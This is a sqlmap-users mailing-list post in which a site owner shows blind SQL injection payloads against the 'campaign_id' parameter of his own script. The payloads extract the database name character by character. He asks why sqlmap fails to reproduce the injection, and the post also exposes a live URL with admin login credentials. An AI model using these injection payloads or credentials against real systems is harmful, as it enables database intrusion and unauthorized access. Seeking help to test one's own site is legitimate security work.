My script is installed on http://myimg.co/trk/lpg/
login " admin ", password " hello "
A security advisor told me that it's injectable while being logged in
manually by modifying the POST param "campaign_id"
Example:
Change " 129*US-LP-PPV*PPV********* " to :
129 and ascii(substring((SELECT database()),1,1))>108*p*ts'*********
109
129 and ascii(substring((SELECT database()),2,1))>120*p*ts'*********
121
129 and ascii(substring((SELECT database()),3,1))>104*p*ts'*********
105
129 and ascii(substring((SELECT database()),4,1))>108*p*ts'*********
109
129 and ascii(substring((SELECT database()),5,1))>102*p*ts'*********
103
129 and ascii(substring((SELECT database()),6,1))>98*p*ts'*********
99
129 and ascii(substring((SELECT database()),7,1))>110*p*ts'*********
111
129 and ascii(substring((SELECT database()),8,1))>94*p*ts'*********
95
129 and ascii(substring((SELECT database()),9,1))>98*p*ts'*********
99
129 and ascii(substring((SELECT database()),10,1))>111*p*ts'*********
112
129 and ascii(substring((SELECT database()),11,1))>117*p*ts'*********
118
This gives database name = myimgco_cpv
However I can't seem to be able to make this work in SQLmap..
Do you guys have any idea? You can try to reproduce this on my server,
without breaking anything please :)
Thanks a lot!
------------------------------------------------------------------------------
Try New Relic Now & We'll Send You this Cool Shirt
New Relic is the only SaaS-based application performance monitoring service
that delivers powerful full stack analytics. Optimize and monitor your
browser, app, & servers with just a few lines of code. Try New Relic
and get this awesome Nerd Life shirt! http://p.sf.net/sfu/newrelic_d2d_may
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
